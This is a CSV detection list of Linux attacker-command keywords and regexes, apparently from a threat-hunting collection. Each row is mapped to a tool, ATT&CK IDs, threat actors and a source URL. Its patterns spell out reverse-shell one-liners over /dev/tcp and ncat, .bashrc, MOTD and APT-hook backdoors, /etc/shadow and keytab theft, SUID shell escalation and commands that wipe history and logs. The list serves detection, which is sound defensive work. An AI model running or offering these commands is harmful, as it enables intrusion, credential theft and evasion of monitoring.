"*citronneur/pamspy*",".{0,1000}citronneur\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*citronneur/pamspy/releases*",".{0,1000}citronneur\/pamspy\/releases.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*class ReverseBash*",".{0,1000}class\sReverseBash.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*cliws -r ws://*",".{0,1000}cliws\s\-r\sws\:\/\/.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","157","27","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z"
"*cloudsplaining scan-multi-account -c accounts.yml -r TargetRole --output-directory ./*",".{0,1000}cloudsplaining\sscan\-multi\-account\s\-c\saccounts\.yml\s\-r\sTargetRole\s\-\-output\-directory\s\.\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","1968","190","2024-11-09T16:23:46Z","2020-03-09T19:12:11Z"
"*cmd/unix/reverse_bash*",".{0,1000}cmd\/unix\/reverse_bash.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*config_steal /etc/krb5.conf /etc/krb5.keytab*",".{0,1000}config_steal\s\/etc\/krb5\.conf\s\/etc\/krb5\.keytab.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*connectd/usr/bin/connectd_d2d*",".{0,1000}connectd\/usr\/bin\/connectd_d2d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#linux","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*Connect-RpcClient * -EndpointPath sudo_elevate_4652*",".{0,1000}Connect\-RpcClient\s.{0,1000}\s\-EndpointPath\ssudo_elevate_4652.{0,1000}","greyware_tool_keyword","sudo","sudo on windows allowing privilege escalation","T1068 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://www.tiraniddo.dev/2024/02/sudo-on-windows-quick-rundown.html","1","0","#linux","N/A","7","8","N/A","N/A","N/A","N/A"
"*COPY anyproxy/ ./anyproxy/*",".{0,1000}COPY\sanyproxy\/\s\.\/anyproxy\/.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#linux","on forked repo","10","10","1473","222","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z"
"*/usr/bin/mega-passwd*",".{0,1000}\/usr\/bin\/mega\-passwd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*cp /etc/shadow /tmp/.*",".{0,1000}cp\s\/etc\/shadow\s\/tmp\/\..{0,1000}","offensive_tool_keyword","EQGR","Equation Group scripts and tools","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tool","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*cp /etc/shadow*",".{0,1000}cp\s\/etc\/shadow.{0,1000}","greyware_tool_keyword","cp","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*cp /var/log/audit/audit.log .tmp*",".{0,1000}cp\s\/var\/log\/audit\/audit\.log\s\.tmp.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","#linux","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z"
"*cp -i /bin/sh */crond*",".{0,1000}cp\s\-i\s\/bin\/sh\s.{0,1000}\/crond.{0,1000}","greyware_tool_keyword","crond","Masquerading as Linux Crond Process.Masquerading occurs when the name or location of an executable* legitimate or malicious. is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.","T1036 - T1564.003 - T1059.004","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml","1","0","#linux","greyware tool - risks of False positive !","N/A","10","8447","2214","2024-12-07T14:47:48Z","2016-12-24T09:48:49Z"
"*cpulimit -l 100 -f -- /bin/sh -p*",".{0,1000}cpulimit\s\-l\s100\s\-f\s\-\-\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*creaktive/tsh*",".{0,1000}creaktive\/tsh.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","1","#linux","N/A","10","6","543","128","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z"
"*crontab* sleep *ncat * -e /bin/bash*crontab*",".{0,1000}crontab.{0,1000}\ssleep\s.{0,1000}ncat\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}crontab.{0,1000}","greyware_tool_keyword","crontab","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Persistence","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*CVE-*.bash*",".{0,1000}CVE\-.{0,1000}\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","1","#linux","N/A","N/A","2","195","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
"*deepce.sh -e *",".{0,1000}deepce\.sh\s\-e\s.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*devine@cr0.net*",".{0,1000}devine\@cr0\.net.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#email #linux","N/A","10","6","543","128","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z"
"*diego-treitos/linux-smart-enumeration*",".{0,1000}diego\-treitos\/linux\-smart\-enumeration.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*dmsetup create base <<EOF*0 3534848 linear /dev/loop0 94208* EOF*./dmsetup ls --exec '/bin/sh -p -s*",".{0,1000}dmsetup\screate\sbase\s\<\<EOF.{0,1000}0\s3534848\slinear\s\/dev\/loop0\s94208.{0,1000}\sEOF.{0,1000}\.\/dmsetup\sls\s\-\-exec\s\'\/bin\/sh\s\-p\s\-s.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*dns_redir.sh *",".{0,1000}dns_redir\.sh\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","0","#linux","N/A","10","10","299","51","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z"
"* passwd.py*",".{0,1000}\spasswd\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","#linux","N/A","9","7","620","60","2024-12-05T01:35:14Z","2023-07-13T18:24:24Z"
"*/passwd.py*",".{0,1000}\/passwd\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","#linux","N/A","9","7","620","60","2024-12-05T01:35:14Z","2023-07-13T18:24:24Z"
"*docker exec -it wiretap-client-1 bash*",".{0,1000}docker\sexec\s\-it\swiretap\-client\-1\sbash.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#linux","N/A","10","9","861","38","2024-11-26T00:33:13Z","2022-11-19T00:19:05Z"
"*dotnet ./Server.dll*",".{0,1000}dotnet\s\.\/Server\.dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","#linux","N/A","10","10","463","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z"
"*-dP -eP -rS -cF -pS -tO -gW --httpx --dnsprobe  -aI webanalyze -sS*",".{0,1000}\-dP\s\-eP\s\-rS\s\-cF\s\-pS\s\-tO\s\-gW\s\-\-httpx\s\-\-dnsprobe\s\s\-aI\swebanalyze\s\-sS.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","#linux","N/A","10","10","2024","381","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z"
"*e69a6f8e45f8dd8ee977b6aed73cac25537c39f6fb74cf9cc225f2af1d9e4cd7*","e69a6f8e45f8dd8ee977b6aed73cac25537c39f6fb74cf9cc225f2af1d9e4cd7","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*echo '''' -/.bash history*",".{0,1000}echo\s\'\'\'\'\s\-\/\.bash\shistory.{0,1000}","greyware_tool_keyword","echo","covering history tracks on linux system","T1070 - T1070.001 - T1070.004 - T1070.003 - T1070.002","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://rosesecurity.gitbook.io/red-teaming-ttps/linux","1","0","#linux","risk of False positive","10","10","N/A","N/A","N/A","N/A"
"*echo '' > ~/.bash_history*",".{0,1000}echo\s\'\'\s\>\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","echo","delete bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*echo """" > /var/log/auth.log *",".{0,1000}echo\s\""\s\>\s\/var\/log\/auth\.log\s.{0,1000}","greyware_tool_keyword","echo","covering history tracks on linux system","T1070 - T1070.001 - T1070.004 - T1070.003 - T1070.002","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://rosesecurity.gitbook.io/red-teaming-ttps/linux","1","0","#linux","risk of False positive","10","10","N/A","N/A","N/A","N/A"
"*echo ""Nothing to see here ... "" > /var/log/kern.log*",".{0,1000}echo\s\""Nothing\sto\ssee\shere\s\.\.\.\s\""\s\>\s\/var\/log\/kern\.log.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*echo %cmdcmdline% | find /i ""%~f0"">nul || exit /b 1*",".{0,1000}echo\s\%cmdcmdline\%\s\|\sfind\s\/i\s\""\%\~f0\""\>nul\s\|\|\sexit\s\/b\s1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","0","#linux","SomalifuscatorV2 used on batch file","10","1","14","5","2024-10-27T01:49:55Z","2024-07-22T20:27:53Z"
"*echo %cmdcmdline% | find /i ""%~f0"">nul || exit /b 1*",".{0,1000}echo\s\%cmdcmdline\%\s\|\sfind\s\/i\s\""\%\~f0\""\>nul\s\|\|\sexit\s\/b\s1.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#linux","N/A","10","3","290","39","2024-11-26T22:44:38Z","2022-09-23T00:46:51Z"
"*echo * .bash_history*",".{0,1000}echo\s.{0,1000}\s\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","#linux","greyware tool - risks of False positive !","10","10","1986","506","2024-12-06T22:33:09Z","2020-06-17T21:48:18Z"
"*echo * /home/*/.bash_history*",".{0,1000}echo\s.{0,1000}\s\/home\/.{0,1000}\/\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","#linux","greyware tool - risks of False positive !","10","10","1986","506","2024-12-06T22:33:09Z","2020-06-17T21:48:18Z"
"*echo * /root/.bash_history*",".{0,1000}echo\s.{0,1000}\s\/root\/\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","#linux","greyware tool - risks of False positive !","10","10","1986","506","2024-12-06T22:33:09Z","2020-06-17T21:48:18Z"
"*download /etc/passwd*",".{0,1000}download\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#linux","N/A","10","10","359","43","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z"
"* http-passwd.nse*",".{0,1000}\shttp\-passwd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*/http-passwd.nse*",".{0,1000}\/http\-passwd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*&passwd=Winter2020&ok=Log+In*",".{0,1000}\&passwd\=Winter2020\&ok\=Log\+In.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#linux","N/A","10","2","109","16","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z"
"*echo *APT::Update::Pre-Invoke *nohup ncat -lvp * -e /bin/bash * > /etc/apt/apt.conf.d/*",".{0,1000}echo\s.{0,1000}APT\:\:Update\:\:Pre\-Invoke\s.{0,1000}nohup\sncat\s\-lvp\s.{0,1000}\s\-e\s\/bin\/bash\s.{0,1000}\s\>\s\/etc\/apt\/apt\.conf\.d\/.{0,1000}","greyware_tool_keyword","bash","Backdooring APT","T1059.004 - T1574.001 - T1027","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*echo *bash -c *bash -i >& /dev/tcp/*/* >> /etc/update-motd.d/00-header*",".{0,1000}echo\s.{0,1000}bash\s\-c\s.{0,1000}bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\>\>\s\/etc\/update\-motd\.d\/00\-header.{0,1000}","greyware_tool_keyword","bash","Backdooring Message of the Day","T1059.004 - T1574.001 - T1027","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*echo 0 > /sys/kernel/debug/tracing/instances/$*/tracing_on*",".{0,1000}echo\s0\s\>\s\/sys\/kernel\/debug\/tracing\/instances\/\$.{0,1000}\/tracing_on.{0,1000}","greyware_tool_keyword","echo","This command turns off tracing for a specific instance","T1562.001 - T1055 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*echo 'alias cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* ",".{0,1000}echo\s\'alias\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider* - Gamaredon - TA4557 - FIN6","C2","https://github.com/cloudflare/cloudflared","1","0","#linux","N/A","10","10","9418","838","2024-12-06T13:05:17Z","2017-10-13T19:54:47Z"
"*echo 'alias cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* ",".{0,1000}echo\s\'alias\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*echo 'alias find=/bin/bash -c 'bash -i >& /dev/tcp/*/*>> ""$user/.bashrc""*",".{0,1000}echo\s\'alias\sfind\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\>\>\s\""\$user\/\.bashrc\"".{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider* - Gamaredon - TA4557 - FIN6","C2","https://github.com/cloudflare/cloudflared","1","0","#linux","N/A","10","10","9418","838","2024-12-06T13:05:17Z","2017-10-13T19:54:47Z"
"*echo 'find cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* ",".{0,1000}echo\s\'find\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*echo 'package main;*net.Dial(""tcp""*exec.Command(""/bin/bash"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""\/bin\/bash\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*echo 'package main;*net.Dial(""tcp""*exec.Command(""/bin/sh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""\/bin\/sh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
